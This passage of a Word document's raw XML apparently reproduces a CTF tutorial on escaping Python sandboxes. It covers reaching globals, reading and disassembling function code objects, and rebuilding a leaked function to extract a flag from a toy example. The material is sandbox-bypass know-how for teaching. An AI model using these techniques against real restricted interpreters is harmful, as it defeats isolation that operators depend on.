    <w:p w14:paraId="7F174A17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{'b': 3, 'names': ('open', 'read'), '__builtins__': &lt;module '__builtin__' (built-in)&gt;, 'codeobj': &lt;code object &lt;module&gt; at 0x7f58c00b26b0, file "noname", line 1&gt;, 'get_flag': &lt;function get_flag at 0x7f58c00b27d0&gt;, 'filename': './poc.py', '__package__': None, 'read': &lt;function read at 0x7f58c00b23d0&gt;, 'code': &lt;type 'code'&gt;, 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': &lt;unbound method catch_warnings.__init__&gt;, '__name__': '__main__', 'foo': &lt;function foo at 0x7f58c020eb50&gt;, '__doc__': None, 'dis': &lt;module 'dis' from '/usr/lib/python2.7/dis.pyc'&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B825B01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12E9F894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#If you have access to some variable value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1F69F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CustomClassObject.__class__.__init__.__globals__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418EF5B9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hyperlink r:id="rId22" w:anchor="globals-and-locals" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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See here more places to obtain globals</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24758A62" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-3"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Accessing the function code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A92B7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Style w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>__code__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>func_code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: You can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access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> this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attribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the function to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obtain the code object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB4A66" w14:textId="46994B5F" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549215AD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In our current example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035679E6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get_flag.__code__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F1D2F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lastRenderedPageBreak/>
        <w:t>&lt;code object get_flag at 0x7f9ca0133270, file "&lt;stdin&gt;", line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F697E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3F5EE34F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Compiling some python code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643340D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compile("print(5)", "", "single")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30B535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&lt;code object &lt;module&gt; at 0x7f9ca01330c0, file "", line 1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A48DF8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11E7232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#Get the attributes of the code object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C9AFB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dir(get_flag.__code__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F128D24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['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD5E97" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Getting Code Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE2AFC1" w14:textId="08972A62" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D6456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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F46A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s = '''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C667FC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a = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FF6ED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b = 'text'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900CDC4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def f(x):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2D927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return x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB19E2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f(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D6170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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485FD7A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c=compile(s, "", "exec")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE13D4C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1EF94A5A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__doc__: Get the description of the function, if any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA62BF2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print.__doc__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0C72A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491597CF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co_consts: Constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6DBC4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get_flag.__code__.co_consts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD1F6C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(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B6972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0ED913F5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c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DF53CE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(5, 'text', &lt;code object f at 0x7f9ca0133540, file "", line 4&gt;, 'f', None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9EC958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689F280E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co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD0A14A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get_flag.__code__.co_names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC8658E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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECD1F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6C40320B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lastRenderedPageBreak/>
        <w:t>c.co_names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CCC21C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('a', 'b', 'f')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F9E96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62B3C86A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261C883D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#co_varnames: Local names used by the bytecode (arguments first, then the local variables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA35E0F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get_flag.__code__.co_varnames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C2D62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('some_input', 'var1', 'var2', 'var3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045CA76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2075041C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#co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B6796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get_flag.__code__.co_cellvars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5031AEEC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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D106DE0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1A53F18F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#co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166C3DB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get_flag.__code__.co_freevars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E747847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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537462F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448C65CC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#Get bytecode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A0C17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get_flag.__code__.co_code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EA50C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'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE9D44" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-3"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Disassembly a function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D426B9" w14:textId="33DF9380" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE6C0F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import dis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E46806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dis.dis(get_flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977693A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2           0 LOAD_CONST               1 (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C8EA5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     3 STORE_FAST               1 (var1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC908BD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4461085C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3           6 LOAD_CONST               2 ('secretcode')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A991F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     9 STORE_FAST               2 (var2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35212316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534BE140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4          12 LOAD_CONST               3 ('some')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D416C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    15 LOAD_CONST               4 ('array')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149398AA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    18 BUILD_LIST               2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D546FB8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    21 STORE_FAST               3 (var3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4EEE5D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0E1B3DD4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5          24 LOAD_FAST                0 (some_input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461FB1E7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    27 LOAD_FAST                2 (var2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8B41F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    30 COMPARE_OP               2 (==)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822F4DD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">             33 POP_JUMP_IF_FALSE       40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40186F78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04791661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6          36 LOAD_CONST               5 ('THIS-IS-THE-FLAG!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C3B2A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    39 RETURN_VALUE        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51568F60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00C73CE8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8     &gt;&gt;   40 LOAD_CONST               6 ('Nope')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76783A63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    43 RETURN_VALUE        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D64EB50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    44 LOAD_CONST               0 (None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A4517A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    47 RETURN_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D68112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Notice that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 xml:space="preserve">if you cannot import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>dis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 xml:space="preserve"> in the python sandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can obtain the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bytecode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the function (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>get_flag.func_code.co_code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">) and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disassemble</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> it locally. You won't see the content of the variables being loaded (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>LOAD_CONST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) but you can guess them from (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>get_flag.func_code.co_consts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">) because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>LOAD_CONST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>also tells the offset of the variable being loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2281E1" w14:textId="2D16C8B1" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD75C5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dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFBE906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 0 LOAD_CONST          1 (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34275895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 3 STORE_FAST          1 (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E17F4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 6 LOAD_CONST          2 (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5469E4F3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 9 STORE_FAST          2 (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D811B0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12 LOAD_CONST          3 (3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF72386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15 LOAD_CONST          4 (4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AC43E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18 BUILD_LIST          2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE73BF6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21 STORE_FAST          3 (3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF44A78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24 LOAD_FAST           0 (0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9D268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27 LOAD_FAST           2 (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769C071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30 COMPARE_OP          2 (==)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F086EA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33 POP_JUMP_IF_FALSE    40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018A51C5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36 LOAD_CONST          5 (5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F962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39 RETURN_VALUE   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE06115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&gt;&gt;   40 LOAD_CONST          6 (6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F96532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43 RETURN_VALUE   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ABE317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44 LOAD_CONST          0 (0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33BE7A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47 RETURN_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1F0EFC" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Compiling Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288EAA06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Now, let us imagine that somehow you can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dump the information about a function that you cannot execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> but you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need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> it. Like in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the following example, you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can access the code object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of that function, but just reading the disassemble you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don't know how to calculate the flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">imagine a more complex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>calc_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D5ECE" w14:textId="3C3327FA" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAC845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def get_flag(some_input):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71EB2F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var1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50586E7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var2="secretcode"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92F04C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var3=["some","array"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19735D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def calc_flag(flag_rot2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BBC63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return ''.join(chr(ord(c)-2) for c in flag_rot2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5626D058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if some_input == var2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13AA85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return calc_flag("VjkuKuVjgHnci")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F816F08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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D6105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return "Nope"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CFD1DC" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Creating the code object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB2C4FB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First of all, we need to know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how to create and execute a code object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> so we can create one to execute our function leaked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613BA5C7" w14:textId="156172A6" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48539FE7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code_type = type((lambda: None).__code__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A4E3D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Check the following hint if you get an error in calling this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31085486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code_obj = code_type(co_argcount, co_kwonlyargcount,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F74C5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      co_nlocals, co_stacksize, co_flags,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F661C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      co_code, co_consts, co_names,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D1106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      co_varnames, co_filename, co_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3052C648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      co_firstlineno, co_lnotab, freevars=None, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D8D5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       cellvars=None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B747D54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7EF8CBDD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Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B1E103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eval(code_obj) #Execute as a whole script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811F028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5336ED9F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If you have the code of a function, execute it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46C45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mydict = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE79780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mydict['__builtins__'] = __builtins__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ABC512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function_type(code_obj, mydict, None, None, None)("secretcode")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B40687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Depending on the python version the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parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>code_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> may have a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different order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. The best way to know the order of the params in the python version you are running is to run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B2B5B" w14:textId="53332021" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B1261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lastRenderedPageBreak/>
        <w:t>import types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD08A6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types.CodeType.__doc__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331BA6C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'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n      flags, codestring, constants, names, varnames, filename, name,\n      firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object.  Not for the faint of heart.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C98D36" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Recreating a leaked function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B317F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In the following example, we are going to take all the data needed to recreate the function from the function code object directly. In a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real example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, all the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values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute the function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>code_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
